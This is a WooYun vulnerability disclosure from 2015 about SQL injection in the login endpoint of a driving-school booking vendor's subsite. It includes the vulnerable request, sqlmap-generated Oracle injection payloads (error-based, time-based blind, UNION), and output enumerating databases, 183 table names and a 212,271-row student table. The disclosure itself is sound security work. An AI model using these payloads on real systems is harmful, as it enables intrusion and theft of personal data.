当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162299

漏洞标题:学车不某分站SQL注入涉及大量学员信息

相关厂商:学车不

漏洞作者: feiyu

提交时间:2015-12-19 19:34

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-19: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

RT

详细说明:

北京驾校的网上约车接入的都是这个公司的产品
《学车不》
自己约约不上 淘宝上居然有人可以给你约
http://**.**.**.**/?from=wsyc
加个符号输入 有报错
POST:
GET /user/stulogin?username=1111111111&password=1111111111111&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/?from=wsyc
Connection: keep-alive
======================================
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: username=1111111111&password=1111111111111' AND 1535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1535=1535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'drKb'='drKb&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: username=1111111111&password=1111111111111' AND 7382=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(75)||CHR(98)||CHR(72),25) AND 'Curn'='Curn&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: username=1111111111&password=1111111111111' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||CHR(115)||CHR(89)||CHR(100)||CHR(76)||CHR(83)||CHR(81)||CHR(120)||CHR(82)||CHR(107)||CHR(98)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113),NULL,NULL,NULL FROM DUAL-- -&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Parameter: username (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: username=1111111111') AND 4980=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (4980=4980) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND ('xKrj'='xKrj&password=1111111111111&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: username=1111111111') AND 4232=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(73)||CHR(99)||CHR(88),25) AND ('yQbI'='yQbI&password=1111111111111&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: username=1111111111') UNION ALL SELECT NULL,NULL,CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||CHR(112)||CHR(115)||CHR(112)||CHR(99)||CHR(69)||CHR(85)||CHR(118)||CHR(113)||CHR(120)||CHR(81)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113),NULL,NULL,NULL FROM DUAL-- -&password=1111111111111&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Oracle
available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] KTJX
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TBSJ
[*] WMSYS
[*] XDB
35个数据库。。
=============================
Parameter: password (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: username=1111111111&password=1111111111111' AND 1535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1535=1535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'drKb'='drKb&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: username=1111111111&password=1111111111111' AND 7382=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(75)||CHR(98)||CHR(72),20) AND 'Curn'='Curn&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: username=1111111111&password=1111111111111' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||CHR(115)||CHR(89)||CHR(100)||CHR(76)||CHR(83)||CHR(81)||CHR(120)||CHR(82)||CHR(107)||CHR(98)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113),NULL,NULL,NULL FROM DUAL-- -&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Oracle
Database: JX
[183 tables]
+---------------------+
| ANSWERTBL |
| AQZ |
| AQ_AQD |
| AQ_AQDJXGX |
| AQ_AQD_JS |
| AQ_AQD_LS |
| AQ_AQD_SD |
| AQ_AQD_SD_DETAIL |
| AQ_AQQS |
| AQ_AQQS_JS |
| AQ_AQQS_SKRQ |
| AQ_XLJS |
| BM_BMTCGZ |
| BM_BZ |
| BM_BZ_JX |
| BM_CL |
| BM_CX |
| BM_CX_JX |
| BM_CX_KS |
| BM_CX_XL |
| BM_CZ |
| BM_DKH |
| BM_DUMMYTIME |
| BM_FLCS |
| BM_GJBM |
| BM_JGLKSF |
| BM_JLCSD |
| BM_JLCSD_XNSD |
| BM_JLCTCFW |
| BM_JLTCPARAMS |
| BM_JX_KYJX |
| BM_KM2JD |
| BM_KSCWZ |
| BM_KSQX |
| BM_LEAVE_REASON |
| BM_MNSFLX |
| BM_PRINTSJINFO |
| BM_PXBX |
| BM_PXLX |
| BM_QTZJLX |
| BM_QXDM |
| BM_SFFS |
| BM_SJD |
| BM_SJD_ADD |
| BM_SJD_ADD2 |
| BM_SJD_PRE |
| BM_SQCX |
| BM_TJYY |
| BM_XCKPJLX |
| BM_XCKPJXM |
| BM_XCKPJXQ |
| BM_XLLX |
| BM_XYBMD |
| BM_XYLY |
| BM_XYZT |
| BM_YHHD |
| BM_YLRXX |
| BM_YYCARTIME |
| BM_ZDCXSS |
| BM_ZJLX |
| BM_ZONE |
| BM_ZZJG |
| CD_JBXX |
| CONFIG_NETTEXT |
| CONN_BASET_DUMMYT |
| CW_CHAGE_TEMP |
| CW_CHARGE |
| CW_CHARGETYPE |
| CW_JZD |
| CW_JZD_DETAIL |
| CZY_JZRQ |
| CZY_LOG |
| CZY_LOG_NET |
| DD_ORDER |
| DD_PAY_INFO |
| EMP_INFO |
| EXAMPARAMETER |
| FC_TZZT |
| FOCUSCARSXL |
| FPZ |
| FP_FPD |
| FP_FPDJXGX |
| FP_FPD_JS |
| FP_FPD_LS |
| FP_FPD_SD |
| FP_FPD_SD_DETAIL |
| FP_FPQS |
| FP_FPQS_JS |
| FP_FPQS_SKRQ |
| FP_SCTQY |
| FP_XLJS |
| HOLIDAY |
| INVESTREPLAYTBL |
| JGPT_SJTBJL |
| JGPT_SJTB_LOG |
| JLC_JBXX |
| JLC_Z |
| JLC_Z_KYBZ |
| JLY_JBXX |
| JX_JBXX |
| KSC_JBXX |
| LIMITEDIPS |
| MACBANGDING |
| QRCODE |
| QS_SZ |
| QUESTIONTBL |
| QXDM |
| REPALYANSWER |
| RS_ZWJBXX |
| SERVER_RESPONSE_LOG |
| SJTB_LOG |
| SKIN |
| SMS_DEMO |
| SP_SJTB_LOG |
| STUCHARGE |
| STUCHARGEINFO |
| STU_JUDGE |
| STU_JUDGE_NET |
| STU_ONLINEINFO |
| SUCCESSCASE |
| SYSTEMPARAM |
| SYSTEMPARAMFORWLB |
| SYSTEMRIGHT |
| SYSTEMRIGHT_TS |
| SYSTEMUSER |
| SYSTEM_SEND |
| SYS_DEPARTMENT |
| SYS_FUNCTION_MODULE |
| SYS_FUNCTION_ROLE |
| SYS_ROLE |
| SYS_TRAIN_TYPE_CODE |
| SYS_USERS |
| SYS_USERS_TS |
| TESTTABLE |
| TOUCHCONFIG |
| XLPARAMETER |
| XTCZJL |
| XTCZTCTYPE |
| XY_CHANGE |
| XY_CJSFYZZP |
| XY_JBXX |
| XY_JBXX_NET |
| XY_JBXX_TMP |
| XY_JMXX |
| XY_JSXX |
| XY_JSZ |
| XY_KM3XLTZ |
| XY_LEAVE |
| XY_PXJL |
| XY_QMXX |
| XY_SFGL |
| XY_SFGL_TMP |
| XY_SFXX |
| XY_SSJL |
| XY_XLBZ |
| XY_XLJS |
| XY_XLTZ |
| XY_XYAQKS |
| XY_XYAQSK |
| XY_XYAQSKZP |
| XY_XYCNL |
| XY_XYFPKS |
| XY_XYFPSK |
| XY_XYFPSKZP |
| XY_XYKQCS |
| XY_XYLK |
| XY_XYXL |
| XY_XYXL_SKJL |
| XY_XYZK |
| XY_XYZTXX |
| XY_ZCFXX |
| XY_ZPXX |
| XY_ZWLOG |
| XY_ZWXX |
| YW_ZDJJ |
| YY_YYAQKS |
| YY_YYCNL |
| YY_YYFPKS |
| YY_YYLK |
| YY_YYXL |
| YY_YYZK |
| ZCUSER_JBXX |
| ZZZID |
+---------------------+
延时速度太慢了
Parameter: password (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: username=1111111111&password=1111111111111' AND 1535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1535=1535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'drKb'='drKb&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: username=1111111111&password=1111111111111' AND 7382=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(75)||CHR(98)||CHR(72),5) AND 'Curn'='Curn&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: username=1111111111&password=1111111111111' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(107)||CHR(106)||CHR(107)||CHR(113)||CHR(115)||CHR(89)||CHR(100)||CHR(76)||CHR(83)||CHR(81)||CHR(120)||CHR(82)||CHR(107)||CHR(98)||CHR(113)||CHR(112)||CHR(113)||CHR(113)||CHR(113),NULL,NULL,NULL FROM DUAL-- -&usertype=0&code=340800024&ISJSONP=true&callback=jsonp1450328883093&_=1450328913796
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Oracle
Database: JX
+---------+---------+
| Table | Entries |
+---------+---------+
| XY_JBXX | 212271 |
+---------+---------+

漏洞证明:

RT

修复方案:

你们懂

版权声明:转载请注明来源 feiyu@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-23 20:14

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无